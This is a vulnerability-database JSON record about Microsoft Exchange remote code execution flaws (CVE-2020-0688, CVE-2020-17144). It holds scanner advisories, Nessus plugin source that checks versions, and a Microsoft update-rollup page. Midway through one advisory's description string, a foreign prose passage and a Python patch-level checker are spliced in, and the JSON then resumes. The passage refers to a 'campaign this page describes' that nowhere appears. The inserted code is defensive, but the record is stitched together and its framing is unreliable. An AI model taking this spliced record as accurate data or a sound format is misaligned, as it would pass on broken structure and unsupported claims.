"AV:N/AC:M/Au:S/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "acInsufInfo": false, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-17144"], "modified": "2020-12-08T00:00:00", "id": "CPAI-2020-1252", "href": "", "cvss": {"score": 6.0, "vector": "AV:N/AC:M/Au:S/C:P/I:P/A:P"}}, {"lastseen": "2022-02-16T19:40:35", "description": "A remote code execution vulnerability exists in Microsoft Exchange Server. 
Successful exploitation of this vulnerability could allow a remote attacker to execute arbitrary code on the affected system.", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "baseScore": 8.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2020-03-01T00:00:00", "type": "checkpoint_advisories", "title": "Microsoft Exchange Server Remote Code Execution (CVE-2020-0688)", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.0, "vectorString": "AV:N/AC:L/Au:S/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-0688"], "modified": "2020-05-01T00:00:00", "id": "CPAI-2020-0104", "href": "", "cvss": {"score": 9.0, "vector": "AV:N/AC:L/Au:S/C:C/I:C/A:C"}}], "nessus": [{"lastseen": "2023-02-10T14:54:59", "description": "The Microsoft Exchange Server installed on the remote host is missing a security update. It is, therefore, affected by a vulnerability:\n\n - A remote code execution vulnerability. An attacker could exploit this to execute unauthorized arbitrary code. 
(CVE-2020-17144)", "cvss3": {"exploitabilityScore": 1.7, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "HIGH", "baseScore": 8.4, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:R/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 6.0}, "published": "2020-12-08T00:00:00", "type": "nessus", "title": "Security Update for Microsoft Exchange Server 2010 SP 3 (December 2020)", "bulletinFamily": "scanner", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 6.8, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.0, "vectorString": "AV:N/AC:M/Au:S/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-17144"], "modified": "2022-12-05T00:00:00", "cpe": ["cpe:/a:microsoft:exchange_server"], "id": "SMB_NT_MS20_DEC_EXCHANGE_2010.NASL", "href": "https://www.tenable.com/plugins/nessus/143566", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from the Microsoft Security Updates API. 
The text\n# itself is copyright (C) Microsoft Corporation.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(143566);\n script_version(\"1.12\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2022/12/05\");\n\n script_cve_id(\"CVE-2020-17144\");\n script_xref(name:\"MSKB\", value:\"4593467\");\n script_xref(name:\"MSFT\", value:\"MS20-4593467\");\n script_xref(name:\"IAVA\", value:\"2020-A-0554-S\");\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2022/05/03\");\n script_xref(name:\"CISA-NCAS\", value:\"AA22-047A\");\n script_xref(name:\"CEA-ID\", value:\"CEA-2020-0138\");\n\n script_name(english:\"Security Update for Microsoft Exchange Server 2010 SP 3 (December 2020)\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The Microsoft Exchange Server installed on the remote host is affected by\na remote code execution vulnerability.\");\n script_set_attribute(attribute:\"description\", value:\n\"The Microsoft Exchange Server installed on the remote host\nis missing a security update. It is, therefore, affected by a vulnerability:\n\n - A remote code execution vulnerability. An attacker could exploit this to\n execute unauthorized arbitrary code. 
(CVE-2020-17144)\");\n # https://support.microsoft.com/en-us/help/4593467/description-of-the-security-update-for-microsoft-exchange-server-2010\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?541b9bde\");\n script_set_attribute(attribute:\"solution\", value:\n\"Microsoft has released the following security update to address this issue:\n -KB4593467\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:S/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:H/UI:R/S:C/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2020-17144\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2020/12/08\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2020/12/08\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2020/12/08\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:microsoft:exchange_server\");\n script_set_attribute(attribute:\"stig_severity\", value:\"I\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Windows : Microsoft Bulletins\");\n\n script_copyright(english:\"This script is Copyright (C) 2020-2022 and is owned by Tenable, Inc. 
or an Affiliate thereof.\");\n\n script_dependencies(\"ms_bulletin_checks_possible.nasl\", \"microsoft_exchange_installed.nbin\");\n script_require_keys(\"SMB/MS_Bulletin_Checks/Possible\");\n script_require_ports(139, 445, \"Host/patch_management_checks\");\n\n exit(0);\n}\n\ninclude('vcf_extras_microsoft.inc');\n\nvar app_info = vcf::microsoft::exchange::get_app_info();\n\nvar constraints =\n[\n {\n 'product' : '2010',\n 'min_version': '14.3.0.0',\n 'fixed_version': '14.03.509.0'\n }\n];\n\nvcf::microsoft::exchange::check_version_and_report\n(\n app_info:app_info,\n bulletin:'MS20-12',\n constraints:constraints,\n severity:SECURITY_WARNING\n);", "cvss": {"score": 6.0, "vector": "AV:N/AC:M/Au:S/C:P/I:P/A:P"}}, {"lastseen": "2023-01-20T15:36:06", "description": "The Microsoft Exchange Server installed on the remote host is missing security updates. It is, therefore, affected by multiple vulnerabilities :\n\n - An elevation of privilege vulnerability exists in Microsoft Exchange Server. An attacker who successfully exploited this vulnerability could gain the same rights as any other user of the Exchange server. This could allow the attacker to perform activities such as accessing the mailboxes of other users. Exploitation of this vulnerability requires Exchange Web Services (EWS) to be enabled and in use in an affected environment.\n (CVE-2020-0692)\n\n - A remote code execution vulnerability exists in Microsoft Exchange software when the software fails to properly handle objects in memory. An attacker who successfully exploited the vulnerability could run arbitrary code in the context of the System user. An attacker could then install programs; view, change, or delete data; or create new accounts. Exploitation of the vulnerability requires that a specially crafted email be sent to a vulnerable Exchange server. 
The security update addresses the vulnerability by correcting how Microsoft Exchange handles objects in memory.\n (CVE-2020-0688)", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "baseScore": 8.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2020-02-11T00:00:00", "type": "nessus", "title": "Security Updates for Exchange (February 2020)", "bulletinFamily": "scanner", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.0, "vectorString": "AV:N/AC:L/Au:S/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-0688", "CVE-2020-0692"], "modified": "2023-01-19T00:00:00", "cpe": ["cpe:/a:microsoft:exchange_server"], "id": "SMB_NT_MS20_FEB_EXCHANGE.NASL", "href": "https://www.tenable.com/plugins/nessus/133617", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n\n\n\n\n# The descriptive text and package checks in this plugin were \n# extracted from the Microsoft Security Updates API. 
The text\n# itself is copyright (C) Microsoft Corporation.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(133617);\n script_version(\"1.20\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2023/01/19\");\n\n script_cve_id(\"CVE-2020-0688\", \"CVE-2020-0692\");\n script_xref(name:\"MSKB\", value:\"4536987\");\n script_xref(name:\"MSKB\", value:\"4536988\");\n script_xref(name:\"MSKB\", value:\"4536989\");\n script_xref(name:\"MSFT\", value:\"MS20-4536987\");\n script_xref(name:\"MSFT\", value:\"MS20-4536988\");\n script_xref(name:\"MSFT\", value:\"MS20-4536989\");\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2022/05/03\");\n script_xref(name:\"CISA-NCAS\", value:\"AA22-011A\");\n script_xref(name:\"CEA-ID\", value:\"CEA-2020-0122\");\n script_xref(name:\"CEA-ID\", value:\"CEA-2020-0017\");\n script_xref(name:\"CEA-ID\", value:\"CEA-2020-0129\");\n script_xref(name:\"CEA-ID\", value:\"CEA-2020-0019\");\n\n script_name(english:\"Security Updates for Exchange (February 2020)\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The Microsoft Exchange Server installed on the remote host is affected by multiple vulnerabilities.\");\n script_set_attribute(attribute:\"description\", value:\n\"The Microsoft Exchange Server installed on the remote host\nis missing security updates. It is, therefore, affected by\nmultiple vulnerabilities :\n\n - An elevation of privilege vulnerability exists in\n Microsoft Exchange Server. An attacker who successfully\n exploited this vulnerability could gain the same rights\n as any other user of the Exchange server. This could\n allow the attacker to perform activities such as\n accessing the mailboxes of other users. 
Exploitation of\n this vulnerability requires Exchange Web Services (EWS)\n to be enabled and in use in an affected environment.\n (CVE-2020-0692)\n\n - A remote code execution vulnerability exists in\n Microsoft Exchange software when the software fails to\n properly handle objects in memory. An attacker who\n successfully exploited the vulnerability could run\n arbitrary code in the context of the System user. An\n attacker could then install programs; view, change, or\n delete data; or create new accounts. Exploitation of the\n vulnerability requires that a specially crafted email be\n sent to a vulnerable Exchange server. The security\n update addresses the vulnerability by correcting how\n Microsoft Exchange handles objects in memory.\n (CVE-2020-0688)\");\n # https://support.microsoft.com/en-us/help/4536987/security-update-for-exchange-server-2019-and-2016\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?cac6add1\");\n # https://support.microsoft.com/en-us/help/4536988/description-of-the-security-update-for-microsoft-exchange-server-2013\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?dce9375f\");\n # https://support.microsoft.com/en-us/help/4536989/security-update-for-exchange-server-2010\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?b23bced2\");\n script_set_attribute(attribute:\"solution\", value:\n\"Microsoft has released the following security updates to address this issue:\n -KB4536987\n -KB4536988\n -KB4536989\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:S/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2020-0688\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n 
script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Exchange Control Panel ViewState Deserialization');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_canvas\", value:\"true\");\n script_set_attribute(attribute:\"canvas_package\", value:\"CANVAS\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2020/02/11\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2020/02/11\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2020/02/11\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:microsoft:exchange_server\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Windows : Microsoft Bulletins\");\n\n script_copyright(english:\"This script is Copyright (C) 2020-2023 and is owned by Tenable, Inc. 
or an Affiliate thereof.\");\n\n script_dependencies(\"ms_bulletin_checks_possible.nasl\", \"microsoft_exchange_installed.nbin\");\n script_require_keys(\"SMB/MS_Bulletin_Checks/Possible\");\n script_require_ports(139, 445, \"Host/patch_management_checks\");\n\n exit(0);\n}\n\ninclude('vcf_extras_microsoft.inc');\n\nvar app_info = vcf::microsoft::exchange::get_app_info();\n\nvar constraints =\n[\n {\n 'product' : '2010',\n 'min_version': '14.3.0.0',\n 'fixed_version': '14.03.496.0',\n 'kb': '4536989'\n },\n {\n 'product' : '2013',\n 'unsupported_cu' : 21,\n 'cu' : 23,\n 'min_version': '15.00.1497.0',\n 'fixed_version': '15.00.1497.6',\n 'kb': '4536988'\n },\n {\n 'product' : '2013',\n 'unsupported_cu' : 21,\n 'cu' : 22,\n 'min_version': '15.00.1497.0',\n 'fixed_version': '15.00.1497.6',\n 'kb': '4536988'\n },\n {\n 'product' : '2016',\n 'unsupported_cu' : 13,\n 'cu' : 15,\n 'min_version': '15.01.1913.0',\n 'fixed_version': '15.01.1913.7',\n 'kb': '4536987'\n },\n {\n 'product': '2016',\n 'unsupported_cu': 13,\n 'cu' : 14,\n 'min_version': '15.01.1847.0',\n 'fixed_version': '15.01.1847.7',\n 'kb': '4536987'\n },\n {\n 'product' : '2019',\n 'unsupported_cu' : 2,\n 'cu' : 3,\n 'min_version': '15.02.464.0',\n 'fixed_version': '15.02.464.11',\n 'kb': '4536987'\n },\n {\n 'product' : '2019',\n 'unsupported_cu' : 2,\n 'cu' : 4,\n 'min_version': '15.02.529.0',\n 'fixed_version': '15.02.529.8',\n 'kb': '4536987'\n }\n];\n\nvcf::microsoft::exchange::check_version_and_report\n(\n app_info:app_info,\n bulletin:'MS20-02',\n constraints:constraints,\n severity:SECURITY_WARNING\n);", "cvss": {"score": 9.0, "vector": "AV:N/AC:L/Au:S/C:C/I:C/A:C"}}, {"lastseen": "2023-02-17T14:26:27", "description": "The Microsoft Exchange Server installed on the remote host is missing security updates. A remote code execution vulnerability exists in Microsoft Exchange software when the software fails to properly handle objects in memory. 
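The constraint list in the Nessus plugin source above encodes the check that matters for the campaign this page describes: an Exchange build that lies inside a cumulative update's range but below that CU's fixed build is still missing the security update for CVE-2020-0688 or CVE-2020-17144. The Python below is an added example, not code from the page, from Tenable or from Microsoft. It restates the fixed builds the two plugins record (KB4536987/KB4536988/KB4536989 and KB4593467) and applies the same min_version <= build < fixed_version comparison; it accepts either an ExSetup.exe file version or the "Version 15.1 (Build 1913.5)" string that Get-ExchangeServer returns. Two caveats the plugin's own logic implies: a build below a constraint's min_version is on an older CU and is not judged by this range check (the plugin's unsupported_cu handling, which this example does not reproduce, covers that case), and AdminDisplayVersion reports the CU rather than the security update, so for SU detection feed in the ExSetup.exe file version (`Get-Command ExSetup.exe | ForEach-Object { $_.FileVersionInfo }`). All version strings in the code are constructed test input.

```python
"""Flag an Exchange build that sits inside a CU's range but below its fixed build.

Added example; not code from the page, from Tenable or from Microsoft. The
constraint table restates the fixed builds the Nessus plugins above record for
KB4536987/KB4536988/KB4536989 (CVE-2020-0688) and KB4593467 (CVE-2020-17144).
Version strings passed in below are constructed test input.
"""
import re
from typing import List, NamedTuple, Tuple

Build = Tuple[int, int, int, int]


class Constraint(NamedTuple):
    product: str        # "2010", "2013", "2016", "2019"
    min_version: str    # first build of the cumulative update the fix targets
    fixed_version: str  # first build that carries the security update
    kb: str
    cve: str


CONSTRAINTS: List[Constraint] = [
    Constraint("2010", "14.3.0.0",     "14.03.496.0",  "KB4536989", "CVE-2020-0688"),
    Constraint("2010", "14.3.0.0",     "14.03.509.0",  "KB4593467", "CVE-2020-17144"),
    Constraint("2013", "15.00.1497.0", "15.00.1497.6", "KB4536988", "CVE-2020-0688"),
    Constraint("2016", "15.01.1847.0", "15.01.1847.7", "KB4536987", "CVE-2020-0688"),
    Constraint("2016", "15.01.1913.0", "15.01.1913.7", "KB4536987", "CVE-2020-0688"),
    Constraint("2019", "15.02.464.0",  "15.02.464.11", "KB4536987", "CVE-2020-0688"),
    Constraint("2019", "15.02.529.0",  "15.02.529.8",  "KB4536987", "CVE-2020-0688"),
]


def parse_build(text: str) -> Build:
    """Turn '15.01.1913.7' (ExSetup.exe file version) or
    'Version 15.1 (Build 1913.5)' (Get-ExchangeServer AdminDisplayVersion)
    into a tuple that compares numerically, so that build 464.11 is not
    sorted below 464.8 the way a string comparison would place it."""
    nums = [int(n) for n in re.findall(r"\d+", text)]
    if len(nums) != 4:
        raise ValueError(f"not an Exchange build: {text!r}")
    return nums[0], nums[1], nums[2], nums[3]


def product_for(build: Build) -> str:
    """Map the major.minor of a build to the Exchange marketing version."""
    major, minor = build[0], build[1]
    if major == 14:
        return "2010"
    if major == 15 and minor in (0, 1, 2):
        return {0: "2013", 1: "2016", 2: "2019"}[minor]
    raise ValueError(f"unknown Exchange product for build {build}")


def missing_updates(version_text: str) -> List[Tuple[str, str]]:
    """Return the (KB, CVE) pairs the installed build still lacks.

    A constraint applies only when the build is inside its CU range
    (min_version <= build < fixed_version). A build below min_version is on
    an older CU and is not judged here; the Nessus plugin covers that with its
    'unsupported_cu' field, which this example does not reproduce."""
    build = parse_build(version_text)
    product = product_for(build)
    missing = []
    for c in CONSTRAINTS:
        if c.product != product:
            continue
        if parse_build(c.min_version) <= build < parse_build(c.fixed_version):
            missing.append((c.kb, c.cve))
    return missing


if __name__ == "__main__":
    # Constructed sample inputs: one unpatched 2016 CU15 server, one patched,
    # one 2010 server with the February fix but not the December one, and
    # an AdminDisplayVersion string (which never reflects SUs, see lead-in).
    for sample in ("15.01.1913.5", "15.01.1913.7", "14.3.500.0",
                   "Version 15.2 (Build 529.5)"):
        print(sample, "->", missing_updates(sample) or "no missing update in this table")
```

The two 2010 rows share a min_version but carry different fixed builds, so a 14.3.500.x server is reported as missing only KB4593467, which is the situation the December 2020 rollup above describes when it says it replaces the February 2020 update.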
An attacker who successfully exploited the vulnerability could run arbitrary code in the context of the System user. An attacker could then install programs; view, change, or delete data; or create new accounts.", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "baseScore": 8.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2020-03-06T00:00:00", "type": "nessus", "title": "Microsoft Exchange Remote Code Execution Vulnerability", "bulletinFamily": "scanner", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.0, "vectorString": "AV:N/AC:L/Au:S/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-0688", "CVE-2020-0692"], "modified": "2020-03-06T00:00:00", "cpe": ["cpe:/a:microsoft:exchange_server"], "id": "701277.PRM", "href": "https://www.tenable.com/plugins/nnm/701277", "sourceData": "Binary data 701277.prm", "cvss": {"score": 9.0, "vector": "AV:N/AC:L/Au:S/C:C/I:C/A:C"}}], "mskb": [{"lastseen": "2022-08-24T11:31:01", "description": "None\nThis update rollup is a security update that provides a security advisory in Microsoft Exchange. 
To learn more about these vulnerabilities, see the following Common Vulnerabilities and Exposures (CVE):\n\n * [CVE-2020-17144 | Microsoft Exchange Remote Code Execution Vulnerability](<https://portal.msrc.microsoft.com/en-us/security-guidance/advisory/CVE-2020-17144>)\n\n## Known issues in this security update\n\n * When you try to manually install this security update by double-clicking the update file (.msp) to run it in \"Normal mode\" (that is, not as an administrator), some files are not correctly updated. When this issue occurs, you don\u2019t receive an error message or any indication that the security update was not correctly installed. However, Outlook Web Access (OWA) and the Exchange Control Panel (ECP) may stop working. This issue occurs on servers that are using user account control (UAC). The issue occurs because the security update doesn\u2019t correctly stop certain Exchange-related services. To avoid this issue, follow these steps to manually install this security update:\n 1. Select **Start**, and type **cmd**.\n 2. In the results, right-click **Command Prompt**, and then select **Run as administrator**.\n 3. If the **User Account Control** dialog box appears, verify that the default action is the action that you want, and then select **Continue**.\n 4. Type the full path of the .msp file, and then press Enter.\nThis issue does not occur when you install the update through Microsoft Update.\n * Exchange services may remain in a disabled state after you install this security update. This condition does not indicate that the update is not installed correctly. This condition may occur if the service control scripts experience a problem when they try to return Exchange services to their usual state. To fix this issue, use Services Manager to restore the startup type to **Automatic**, and then start the affected Exchange services manually. To avoid this issue, run the security update at an elevated command prompt. 
For more information about how to open an elevated Command Prompt window, see [Start a Command Prompt as an Administrator](<https://technet.microsoft.com/en-us/library/cc947813\\(v=ws.10\\).aspx>).\n\n## How to get and install the update\n\n### Method 1: Microsoft Update\n\nThis update is available from Microsoft Update. When you turn on automatic updating, this update will be downloaded and installed automatically. For more information about how to get security updates automatically, see [Windows Update: FAQ](<https://support.microsoft.com/help/12373/windows-update-faq>).\n\n### Method 2: Microsoft Update Catalog\n\nTo get the standalone package for this update, go to the [Microsoft Update Catalog](<http://www.catalog.update.microsoft.com/Search.aspx?q=KB4593467>) website.\n\n### Method 3: Microsoft Download Center\n\nYou can get the standalone update package through the Microsoft Download Center.\n\n * [Download Update Rollup 31 for Exchange Server 2010 SP3 (KB4536989)](<http://www.microsoft.com/download/details.aspx?FamilyID=565a516b-f84f-4aff-ba8c-1c57c378b418>)\n\n## Update detail information for Exchange Server 2010 SP3\n\n### Installation instructions for Exchange Server 2010 SP3\n\nLearn more about [how to install the latest update rollup for Exchange Server 2010](<http://technet.microsoft.com/library/ff637981.aspx>).Also, learn about the following update installation scenarios.\n\n## \n\n__\n\nInstall the update on computers that aren't connected to the internet\n\nWhen you install this update rollup on a computer that isn't connected to the internet, you may experience a long installation time. 
Additionally, you may receive the following message:\n\nCreating Native images for .Net assemblies.\n\nThis issue is caused by network requests to connect to the following website: \n[http://crl.microsoft.com/pki/crl/products/CodeSigPCA.crl](<http://crl.microsoft.com/pki/crl/products/codesigpca.crl>) \n \nThese network requests are attempts to access the certificate revocation list for each assembly that native image generation (NGen) compiles to native code. However, because the server that's running Exchange Server isn't connected to the internet, each request must wait to time out before the process can continue. \n \nTo fix this issue, follow these steps: \n\n\n 1. In Internet Explorer, select **Internet Options** on the **Tools** menu, and then select **Advanced**.\n 2. In the **Security** section, clear the **Check for publisher's certificate revocation** check box, and then select **OK**. \n \n**Note** Clear this security option only if the computer is in a tightly-controlled environment. \n 3. When the Setup process is finished, select the **Check for publisher's certificate revocation** check box again.\n\n## \n\n__\n\nInstall the update on computers that have customized Outlook Web App files\n\n**Important **Before you apply this update rollup, make a backup copy of any [customized Outlook Web App](<http://technet.microsoft.com/library/ee633483\\(exchg.140\\).aspx>) files. \n \nWhen you apply an update rollup package, the update process updates the Outlook Web App files, if this is required. 
Therefore, any customizations to the Logon.aspx file or to other Outlook Web App files are overwritten, and you must re-create the Outlook Web App customizations in Logon.aspx.\n\n## \n\n__\n\nInstall the update for CAS Proxy Deployment Guidance customers who deploy CAS-CAS proxying\n\nIf your scenario meets both the following conditions, apply the update rollup on the internet-facing Client Access servers (CAS) before you apply the update rollup on the non\u2013internet-facing CAS:\n\n * You're a CAS Proxy Deployment Guidance customer.\n * You have deployed [CAS-CAS proxying](<http://technet.microsoft.com/library/bb310763\\(exchg.140\\).aspx>).\n**Note **For other Exchange Server 2010 configurations, you don't have to apply the update rollup on your servers in any particular order.\n\n## \n\n__\n\nInstall this update on a DBCS version of Windows Server 2012\n\nYou can't install or uninstall Update Rollup 31 for Exchange Server 2010 SP3 on a double-byte character set (DBCS) version of Windows Server 2012 if the language preference for non-Unicode programs is set to the default language. To work around this issue, you must first change this setting. To do this, follow these steps:\n\n 1. In Control Panel, select **Clock, Region and Language**, select **Region**, and then select **Administrative**.\n 2. In the **Language for non-Unicode programs** area, select **Change system locale**.\n 3. 
In the **Current system locale** list, select **English (United States)**, and then select **OK**.\nAfter you successfully install or uninstall Update Rollup 31, revert this language setting, as appropriate.\n\nRestart requirementThe required services are restarted automatically after you apply this update rollup.Removal informationTo remove Update Rollup 31 for Exchange Server 2010 SP3, use the **Add or Remove Programs** item in Control Panel to remove update **KB4593467**.More informationSecurity update deployment informationFor deployment information about this update, see [security update deployment information: December 8, 2020](<https://support.microsoft.com/help/20201208>). Security update replacement informationThis security update replaces the following previously released update:\n\n * Description of the security update for Microsoft Exchange Server 2010: February 11, 2020\nFile informationFile hash informationUpdate name| File name| SHA1 hash| SHA256 hash \n---|---|---|--- \nUpdate Rollup 31 for Exchange Server 2010| Exchange2010-KB4593467-x64-en.msp| 3F41A2ECD7AFB248239C8EF7588D28AE0FE2D3A8| 4B39046903D6D1D0350F503D4EA291487D2661C64880EBC0CC247EB2D8184C74 \n \nExchange Server file informationThe English (United States) version of this update installs files that have the attributes that are listed in the following tables. The dates and times for these files are listed in Coordinated Universal Time (UTC). The dates and times for these files on your local computer are displayed in your local time together with your current daylight-saving time (DST) bias. 
Additionally, the dates and times may change when you perform certain operations on the files.\n\n## \n\n__\n\nUpdate Rollup 31 for Exchange Server 2010\n\nFile name| File version| File size| Date| Time| Platform \n---|---|---|---|---|--- \nA33e7066a3f143ef8386e08c4458051d_premium.css| Not applicable| 202,304| 11-Nov-2020| 21:21| Not applicable \nAbv_dg.dll| 14.3.509.0| 891,800| 11-Nov-2020| 21:20| x64 \nAddreplicatopfrecursive.ps1| Not applicable| 16,001| 11-Nov-2020| 21:21| Not applicable \nAddressbook.aspx| Not applicable| 3,830| 11-Nov-2020| 21:23| Not applicable \nAdduserstopfrecursive.ps1| Not applicable| 15,637| 11-Nov-2020| 21:21| Not applicable \nAf46d2bd14db43e0b49619bd0eeb07ec_premium.css| Not applicable| 202,304| 11-Nov-2020| 21:21| Not applicable \nAggregatepfdata.ps1| Not applicable| 19,565| 11-Nov-2020| 21:21| Not applicable \nAirfilter.dll| 14.3.498.0| 42,384| 11-Nov-2020| 21:22| x64 \nAirsynctistateparser.dll| 14.3.498.0| 76,184| 11-Nov-2020| 21:22| x64 \nAjaxcontroltoolkit.dll| 14.3.498.0| 103,368| 11-Nov-2020| 21:22| x86 \nAlsperf.dll1| 14.3.498.0| 20,376| 11-Nov-2020| 21:20| Not applicable \nAntispamcommon.ps1| Not applicable| 13,893| 11-Nov-2020| 21:20| Not applicable \nAsdat.msi| Not applicable| 5,079,040| 11-Nov-2020| 21:20| Not applicable \nAsentirs.msi| Not applicable| 69,632| 11-Nov-2020| 21:25| Not applicable \nAsentsig.msi| Not applicable| 69,632| 11-Nov-2020| 21:25| Not applicable \nAttachfiledialog.aspx| Not applicable| 5,346| 11-Nov-2020| 21:23| Not applicable \nAutodisc_web.config| Not applicable| 89,637| 11-Nov-2020| 21:24| Not applicable \nBasicaddressbook.aspx| Not applicable| 4,217| 11-Nov-2020| 21:23| Not applicable \nBasicattachmentmanager.aspx| Not applicable| 3,826| 11-Nov-2020| 21:23| Not applicable \nBasicautosaveinfo.aspx| Not applicable| 4,255| 11-Nov-2020| 21:23| Not applicable \nBasiccalendaritemschedulingtab.aspx| Not applicable| 6,908| 11-Nov-2020| 21:23| Not applicable \nBasiccalendarview.aspx| Not applicable| 3,259| 
11-Nov-2020| 21:23| Not applicable
